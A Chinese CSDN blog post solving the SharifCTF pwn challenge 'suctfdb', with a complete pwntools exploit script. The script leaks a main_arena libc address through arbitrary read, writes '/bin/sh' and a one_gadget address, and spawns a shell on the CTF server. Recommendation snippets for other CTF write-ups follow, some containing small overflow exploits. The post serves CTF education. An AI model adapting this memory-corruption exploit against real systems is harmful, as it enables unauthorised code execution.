sharif ctf pwn suctfdb writeup

最新推荐文章于 2024-01-18 14:58:45 发布
最新推荐文章于 2024-01-18 14:58:45 发布
阅读量659 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/charlie_heng/article/details/79254615
本文介绍了一个在 SharifCTF 中遇到的挑战,通过分析 Python 代码和 so 文件,揭示了如何利用内存操作漏洞进行攻击。文中详细解释了如何利用这些漏洞来泄露地址、控制流程并最终获取 shell 的过程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

这两天打了一下sharif ctf,比赛平台居然在打着打着的时候被墙……

这题一拿到的时候真的一脸懵逼,python??? so???

后面静下心来,仔细看了下,发现漏洞多得不得了。。。。

其实主要内存操作都在so里面,所以结合着python代码和so来看就可以了

因为这题可以任意写db的内容,所以可以实现,写任意地址,读任意地址,控制流劫持

虽然有这么多东西,但是利用起来还是有点麻烦的,因为没给libc,这个so也是pie的,读不了got表里面的内容

这题创建完db之后,可以选打印那个函数,打印出一个地址,那个地址是main arena的地址

所以首先是先写个leak函数,把两个libc函数的地址给leak出来,然后到https://libc.blukat.me/查libc的版本,然后就可以下载到libc,然后再利用one gedget这个工具找出magic number,跳转到 libc基址加magic number的地址就可以get到shell了,
因为这个one gedget还有些条件限制….所以会造成本地get不到shell ,但是在服务器就get到shell的现象…….

下面就是利用的代码,每个人的环境不同,可能需要改一些值

from pwn import *

debug=0
if debug:
    p=process('./server.py')
    offset=0x399
    system_offset=0x3F450
    oneget_offset=0x3f32a   
else:
    p=remote('ctf.sharif.edu', 22106)
    offset=0x3c4
    system_offset=0x45390
    oneget_offset=0x45216

#gdb.attach(proc.pidof(p)[0])
#context.log_level='debug'


def create_db(id,tag,length):
    p.recvuntil('Exit')
    p.sendline(str(id))
    sleep(0.1)
    p.sendline(tag)
    sleep(0.1)
    p.sendline(str(length))

def edit_db(index,pay):
    p.sendline('2')
    p.recvuntil('Which one to edit:')    
    p.sendline(str(index))
    sleep(0.1)
    p.sendline(pay)
    p.recvuntil('Exit\n')

def print_db(index):
    p.sendline('3')
    p.recvuntil('Which')
    p.sendline(str(index))
    p.recvuntil('seq')    
    data=p.recvuntil('1.')
    data=data[:-3]
    return data

def delete_db():
    p.sendline('4')
    p.recvuntil('menu>')

def run_method():
    p.sendline('5')

def leak(addr):
    edit_db(1,'1'*0x10+p64(0)+p64(addr))
    data=print_db(2)
    dindex=data.index('seq: ')+5
    data=data[dindex:]
    if(len(data)==0):
        remain=p.recvrepeat(0.1)
        return '\x00'
    remain=p.recvrepeat(0.01)
    return data


raw_input()
create_db(1,'2',3)
sleep(0.1)
p.sendline('1')
sleep(0.1)
p.recvuntil('Exit')
main_arena=print_db(2)
mindex=main_arena.index('seq: ')+5
main_arena=main_arena[mindex:mindex+6]+'\x00'*(8-6)
main_arena=struct.unpack('<Q',main_arena)[0]



print(hex(main_arena))
raw_input()
d1=leak(main_arena-0x88)
print(d1)
d1=struct.unpack('<Q',d1+'\x00\x00')[0]
print(hex(d1))

edit_db(1,'/bin/sh;'+p64(1)+p64(0)+p64(main_arena-0x40)+p64(8))
edit_db(2,'/bin/sh;')

main_arena=main_arena-main_arena%0x1000
base=main_arena-offset*0x1000

print(hex(base))
#d = DynELF(leak,d1)
#system=d.lookup('system','libc')



edit_db(1,'/bin/sh;'+p64(0)*4+p64(oneget_offset+base))
run_method()
p.interactive()
CTF考核writeup(2)
一段旅途
11-23 2373
没有什么,保存下来。主要有xss csrf 绕过 上传的内容。
CTF-MISC练习
dahege666的博客
12-25 2254
1、AsianCheetah 使用stegsolve打开图片,点击左右箭头后并没有什么发现, 这个图片其实LSB隐写 首先选一个颜色的最低为,然后选择LSB 进行preview后,没有什么发现 当选择蓝色blue最低位时找到flag 二、使用zsteg,,将所有的排列组合直接显示出来,只针对PNG和BMP图片 现在kali中安装zsteg, 然后 zsteg + 图片文件 2、dandelion 使用stegsolve打开图片 ...
CTF PWN-攻防世界XCTF新手区WriteUp
热门推荐
道阻且长,行则将至
10-20 1万+
文章目录前言001 get_shell002 hello_pwn 前言 PWN 是一个黑客语法的俚语词 ,是指攻破设备或者系统 。发音类似“砰”,对黑客而言,这就是成功实施黑客攻击的声音——砰的一声,被“黑”的电脑或手机就被你操纵。以上是从百度百科上面抄的简介,而我个人理解的话,应该就是向目标发送特定的数据,使得其执行本来不会执行的代码,前段时间爆发的永恒之蓝等病毒其实也算得上是 pwn 的一种。 CTFPWN 类型的题目的目标是拿到 flag,一般是在 linux 平台下通过二进制/系统调用等方式编
pwn-100(L-CTF-2016)--write up
ATFWUS的博客
03-11 1103
文件下载地址: 链接:https://pan.baidu.com/s/1SkbJmjnCtZETaafLEIUuLQ 提取码:wjb0 前言:风萧萧兮雨萧萧,忆君兮,不知。 0x01.分析 checksec: 分析源码: 发现主要功能在sub_40063D,我们分析一下该函数,发现,该函数的功能是:向v1写满200字节,且一定要写...
redpwnCTF 2020 pwn部分writeup
SkYe's Blog
06-25 944
coffer-overflow-0 分析 保护情况 Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000) 漏洞函数 题目给了程序源代码,但是我们还是按照正常题目做法分析二进制文件。 漏洞就在 main 中,gets 函数存在栈溢出: int __cdecl main(int argc, const char **
L-CTF2016 PWN200 writeup
哒君的博客
08-02 724
本以为已经可以做出题来了。。。没想到连利用点在哪都没看见 例行公事 居然什么保护都没开,有趣 利用点分析 v2位于rbp-0x30的位置,而name会读入0x30个字符,且如果读入0x30个字符的话末尾不会有\x00,这样在printf的时候就会顺带leak出rbp的值 id保存在rbp-0x38的位置 *buf在栈上的位置是rbp-0x40,dest在栈上的位置是rbp-0x8,但是b...
sharif_course_list:SUT的课程列表的摘要
05-10
该存储库是Sharif科技大学提供的课程的 ,始于2020年秋季学期(贾拉利1399年)。 数据包括每个系的可用课程,以及有关这些课程的详细信息(课程的最大容量,教授,前提条件,注册学生的数量,...)。 提供刮取并...
Sharif网站
02-14
这个项目的名称暗示它可能与Sharif大学、机构或个人有关,或者是一个与伊朗Sharif相关的项目,因为"Sharif"在伊朗常用于大学或教育机构的名字。 在这个名为"SharifWebsite-main"的压缩包中,我们可以期待找到一系列...
Pardis-Fees-Calculator:用于Sharif UT(德黑兰国际校园)的费用计算器
02-13
《Pardis费用计算器:构建德黑兰 Sharif UT 国际校园费用估算工具》 在信息技术领域,软件工具的开发对于解决特定问题至关重要。"Pardis Fees Calculator" 就是一个这样的工具,专为德黑兰的Sharif University of ...
java版本源码和php源码下载-Sharif-Judge:一个免费开源的编程课程在线评判系统
06-04
Sharif Judge 中的 Python 尚未沙盒化。 只为 python 提供了低级别的安全性。 如果您想将 Sharif Judge 用于 python,请自担风险使用它或自己提供沙箱。 完整的文档位于 从以下位置下载最新版本 特征 多个用户角色...
UNCTF pwn部分writeup
sea_time的博客
11-16 475
UNCTF pwn babyrop(栈溢出) 解题过程 首先覆盖变量,然后开启后门,然后通过后门函数来libc leak,然后再次回到后门函数,再次跳转到libc空间执行system("/bin/sh"),需要注意的是,对ret地址进行了check,所以先跳到ret上,然后通过check再到libc空间。 IDA打开 程序很简单 int __cdecl main() { char buf; /...
suctf_2018_basic pwn
qq_62887641的博客
09-20 163
给出后门,ret2text。
[BUUCTF]PWN——suctf_2018_basic pwn
mcmuyanga的博客
02-02 701
suctf_2018_basic pwn 附件 步骤 例行检查,64位程序,开启了RELRO和NX 试运行一下程序,看看大概的情况 64位ida载入,检索字符串的时候发现了读出flag的函数,flag_addr=0x401157 main() s存在溢出,简单的覆盖返回地址到后门函数类型的题目 完整exp from pwn import * r=remote('node3.buuoj.cn',25779) flag_addr=0x401157 payload='a'*(0x110+8)+p6
BUUCTF-PWN-Writeup-1-5
feng的博客
01-20 3344
前言 开始刷一刷BuuctfPWN题,一遍学一遍刷题了。 其实主要是堆学的顶不住了。。。一个下午才搞懂一个知识点,太tm的难了。 test_your_nc from pwn import * from LibcSearcher import * context(log_level="debug",os="linux") p = remote('node4.buuoj.cn',27517) p.interactive() rip 坑。。。。 一个gets的栈溢出,后门函数fun()在0x401186,本
BUUCTF(PWN)suctf_2018_stack
半岛铁盒的博客
04-03 342
from pwn import * p = remote('node3.buuoj.cn',29039) ret_addr = 0x0400677 payload = 'a' * (0x20 + 8) + p64(ret_addr) p.send(payload) p.interactive() 不是676的原因是 这道题检查的其实是栈平衡的问题,因为是Ubuntu18,需要栈对齐 ...
pwn】[SUCTF 2018 招新赛]unlink --堆利用之unlink
最新发布
question55的博客
01-18 1647
先来看一下程序的保护情况堆栈不可执行,而且还开了canary看一下ida又是经典菜单题,接着分析每一个函数功能就行touch函数:有一个数组存malloc出来的地址delete函数:删除堆中的数据,不存在uaf漏洞show函数:打印堆中数据take_note函数:向堆中写数据分析到这里,根据题目的提示,那就用unlink来打,这里有篇博客可以先学习一下:【pwn学习】堆溢出(三)- Unlink和UAF_堆溢出 got表-优快云博客首先我们先创建三个堆块debug看一下再看看一下存堆地址的数组接着我们来构
数据结构-栈(C语言代码)
weixin_50246370的博客
08-12 5853
栈(stack)又名堆栈,它是一种运算受限的线性表。限定仅在表尾进行插入和删除操作的线性表。这一端被称为栈顶,相对地,把另一端称为栈底。向一个栈插入新元素又称作进栈、入栈或压栈,它是把新元素放到栈顶元素的上面,使之成为新的栈顶元素;从一个栈删除元素又称作出栈或退栈,它是把栈顶元素删除掉,使其相邻的元素成为新的栈顶元素。 #include <stdio.h> #include <stdlib.h> typedef struct Node { int data; struct.
[BUUCTF-pwn]——suctf_2018_stack
Y_peak的博客
03-11 558
[BUUCTF-pwn]——suctf_2018_stack 题目地址:https://buuoj.cn/challenges#suctf_2018_stack 什么保护都没开 在IDA中一查看,发现有点简单太简单了.本来刚开始以为溢出空间不够只有两个地址,一个epb, 一个返回地址, 可是结果仅仅返回地址就可以了 exploit from pwn import * p = remote('node3.buuoj.cn',29819) leave_ret = 0x000000000040073
2018 SUCTF cycle
ACdream
06-08 559
比赛的时候看到这个题,通过率那么高,然后密钥长度给了提示是1-50,所以猜到了是暴力,太久没做Crypto了,已经忘记了还有维吉尼亚字频统计这一说了……找到了一个好的wp贴出来:https://findneo.tech/180527suctf/#Magic...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值